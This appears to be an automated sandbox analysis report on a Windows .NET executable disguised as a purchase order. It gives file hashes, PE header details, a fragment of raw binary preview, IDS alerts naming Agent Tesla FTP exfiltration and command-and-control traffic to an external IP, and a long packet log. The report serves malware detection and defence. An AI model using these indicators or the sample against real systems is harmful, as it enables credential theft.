                                            MD5:0FD28ED18E522B9EEF69B57AA8BDBF8F
                                            SHA1:5EBA649F7E0CEAD07E1788973B9DEAE4C54E7A46
                                            SHA-256:3996FDEC3CEAC6027730777EC99F6870A9C76E3904A1D2C78CEF954A7484090E
                                            SHA-512:35C1798D1088999A2C605134525FC6D17BCBF5C9F25910C295992F9FA599965A857505F0570614B62DE65CD9A24525636F6144D20F014E2E661DF781C45B90D9
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: ReversingLabs, Detection: 47%
                                            • Antivirus: Virustotal, Detection: 33%, Browse
                                            Reputation:low
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....o.f.................*...........I... ...`....@.. ....................................`..................................H..K....`............................................................................... ............... ..H............text....)... ...*.................. ..`.rsrc........`.......,..............@..@.reloc...............2..............@..B.................H......H.......p................................................................*...(....*...(....*.0..W....... ........8........E............8....*("...(........o.... ....~....{'...9....& ....8.......(....*&~.......*...~....*..0.......... ........8........E................8.....s...... ....~....{....:....& ....8........E........'.......8....... ....~....{....9....& ....8.......r...p(...... ....~....{....9....& ....8........E........8..........9[... ....~....{....:....& ....8......
                                            Process:C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:modified
                                            Size (bytes):26
                                            Entropy (8bit):3.95006375643621
                                            Encrypted:false
                                            SSDEEP:3:ggPYV:rPYV
                                            MD5:187F488E27DB4AF347237FE461A079AD
                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                            Malicious:true
                                            Reputation:high, very likely benign file
                                            Preview:[ZoneTransfer]....ZoneId=0
                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Entropy (8bit):5.449510671154793
                                            TrID:
                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                            • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                            File name:PO_9876563647-FLOWTRONIX (FT)UUE.exe
                                            File size:537'600 bytes
                                            MD5:0fd28ed18e522b9eef69b57aa8bdbf8f
                                            SHA1:5eba649f7e0cead07e1788973b9deae4c54e7a46
                                            SHA256:3996fdec3ceac6027730777ec99f6870a9c76e3904a1d2c78cef954a7484090e
                                            SHA512:35c1798d1088999a2c605134525fc6d17bcbf5c9f25910c295992f9fa599965a857505f0570614b62de65cd9a24525636f6144d20f014e2e661df781c45b90d9
                                            SSDEEP:12288:zjEd+1wfcT78ZE9mBMnliO+CDbX1AlVtFtu6B:zjEdRfcT78ZE9munli/CDbXulDHu6B
                                            TLSH:53B45F07B94F99F1E9441F7AC69B15404BA9D69037EFC71E798A23A607C37AAFC01207
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....o.f.................*...........I... ...`....@.. ....................................`................................
                                            Icon Hash:00928e8e8686b000
                                            Entrypoint:0x48490e
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x66FA6F9C [Mon Sep 30 09:30:04 2024 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                            Instruction
                                            jmp dword ptr [00402000h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x848c0 | 0x4b | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x86000 | 0x588 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x88000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x82914 | 0x82a00 | c5ea1b2074df9b61bde3752dad4a96fb | False | 0.4205704246411483 | SysEx File - Victor | 5.45514582006557 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x86000 | 0x588 | 0x600 | 6d4802b7bcdbf8aa10259b272b66a0a2 | False | 0.4153645833333333 | data | 4.032121392018966 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x88000 | 0xc | 0x200 | 2a79473b288374d8661e3566dbbf1bee | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x860a0 | 0x2fc | data | | | 0.43848167539267013
RT_MANIFEST | 0x8639c | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-01T07:31:26.751565+0200 | 2017962 | ET MALWARE PE EXE or DLL Windows file download disguised as ASCII | 1 | 67.212.175.162 | 443 | 192.168.2.8 | 49705 | TCP
2024-10-01T07:31:26.751565+0200 | 2022640 | ET MALWARE PE EXE or DLL Windows file download Text M2 | 1 | 67.212.175.162 | 443 | 192.168.2.8 | 49705 | TCP
2024-10-01T07:31:32.844326+0200 | 2029927 | ET MALWARE AgentTesla Exfil via FTP | 1 | 192.168.2.8 | 49706 | 5.2.84.236 | 21 | TCP
2024-10-01T07:31:33.460095+0200 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.8 | 49707 | 5.2.84.236 | 63484 | TCP
2024-10-01T07:31:33.465327+0200 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.8 | 49707 | 5.2.84.236 | 63484 | TCP
2024-10-01T07:31:42.581347+0200 | 2017962 | ET MALWARE PE EXE or DLL Windows file download disguised as ASCII | 1 | 67.212.175.162 | 443 | 192.168.2.8 | 49710 | TCP
2024-10-01T07:31:42.581347+0200 | 2022640 | ET MALWARE PE EXE or DLL Windows file download Text M2 | 1 | 67.212.175.162 | 443 | 192.168.2.8 | 49710 | TCP
2024-10-01T07:31:48.017800+0200 | 2029927 | ET MALWARE AgentTesla Exfil via FTP | 1 | 192.168.2.8 | 49712 | 5.2.84.236 | 21 | TCP
2024-10-01T07:31:48.642241+0200 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.8 | 49713 | 5.2.84.236 | 61512 | TCP
2024-10-01T07:31:48.647690+0200 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.8 | 49713 | 5.2.84.236 | 61512 | TCP
2024-10-01T07:31:50.753234+0200 | 2017962 | ET MALWARE PE EXE or DLL Windows file download disguised as ASCII | 1 | 67.212.175.162 | 443 | 192.168.2.8 | 49714 | TCP
2024-10-01T07:31:50.753234+0200 | 2022640 | ET MALWARE PE EXE or DLL Windows file download Text M2 | 1 | 67.212.175.162 | 443 | 192.168.2.8 | 49714 | TCP
2024-10-01T07:31:56.098704+0200 | 2029927 | ET MALWARE AgentTesla Exfil via FTP | 1 | 192.168.2.8 | 49715 | 5.2.84.236 | 21 | TCP
2024-10-01T07:31:56.716214+0200 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.8 | 49716 | 5.2.84.236 | 64722 | TCP
2024-10-01T07:31:56.721436+0200 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.8 | 49716 | 5.2.84.236 | 64722 | TCP
                                            TimestampSource PortDest PortSource IPDest IP
                                            Oct 1, 2024 07:31:26.909199953 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.909260988 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:26.909301043 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.909373045 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:26.910131931 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.910214901 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:26.910218954 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.910229921 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.910305977 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:26.910337925 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.910408020 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:26.911166906 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.911292076 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:26.911292076 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.911302090 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.911370039 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:26.912162066 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.912210941 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.912210941 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:26.912230015 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.912271976 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:26.912271976 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:26.926873922 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:26.926918030 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:26.928985119 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.929090023 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:26.929255009 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.929332972 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:26.995954037 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.996064901 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:26.996249914 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.996300936 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:26.996532917 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.996599913 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:26.996607065 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.996653080 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:26.996900082 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.996953964 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:26.997211933 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.997294903 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:26.997347116 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.997400045 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.001087904 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.001135111 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.001220942 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.001300097 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.001306057 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.001315117 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.001338959 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.001383066 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.001722097 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.001817942 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.002049923 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.002161980 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.002275944 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.002330065 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.002352953 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.002409935 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.017788887 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.017834902 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.017913103 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.017920971 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.017956018 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.017956018 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.036510944 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.036626101 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.084671974 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.084742069 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.084799051 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.084806919 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.084825993 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.084858894 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.084975004 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.085053921 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.085112095 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.085161924 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.085189104 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.085203886 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.085220098 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.085268021 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.085346937 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.085397959 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.085536957 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.085599899 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.085728884 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.085788012 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.085897923 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.085958958 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.086029053 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.086081028 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.086200953 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.086236954 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.086287022 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.086287022 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.086292982 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.086333036 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.086570024 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.086626053 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.086687088 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.086744070 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.088483095 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.088674068 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.106331110 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.106421947 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.106507063 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.106575012 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.173362017 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.173429012 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.173448086 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.173459053 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.173497915 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.173497915 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.173640966 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.173690081 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.173711061 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.173716068 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.173748970 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.173748970 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.173866987 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.173922062 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.174073935 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.174170017 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.174196959 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.174294949 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.174402952 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.174535990 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.174560070 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.174606085 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.174628973 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.174634933 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.174662113 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.174690008 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.174932003 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.174978971 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.175137997 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.175182104 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.175213099 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.175216913 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.175259113 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.175259113 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.175337076 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.175414085 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.195092916 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.195151091 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.195229053 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.195229053 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.195238113 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.195275068 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.262156010 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.262295008 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.262321949 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.262396097 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.262403965 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.262495041 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.262612104 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.262612104 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.262624979 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.262676001 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.262676001 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.262686014 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.262752056 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.262855053 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.262892008 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.262932062 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.262932062 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.262937069 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.262976885 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.263075113 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.263158083 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.263209105 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.263272047 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.263335943 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.263410091 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.263473034 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.263536930 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.263741016 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.263798952 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.263886929 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.263974905 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.264050007 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.264118910 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.264120102 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.264128923 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.264192104 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.283972979 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.284041882 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.284071922 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.284085035 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.284106016 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.284133911 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.351903915 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.351958990 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.352000952 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.352010965 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.352071047 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.352097034 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.352109909 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.352178097 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.352322102 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.352385044 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.352482080 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.352577925 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.352760077 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.352798939 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.352819920 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.352824926 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.352881908 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.352881908 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.352905989 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.352982998 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.353029013 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.353094101 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.353252888 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.353322983 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.353446007 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.353486061 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.353502989 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.353507042 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.353554010 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.353554010 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.353835106 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.353872061 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.353992939 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.353998899 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.354245901 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.372616053 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.372656107 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.372852087 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.372859955 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.372951984 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.440820932 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.440953970 CEST4434970567.212.175.162192.168.2.8
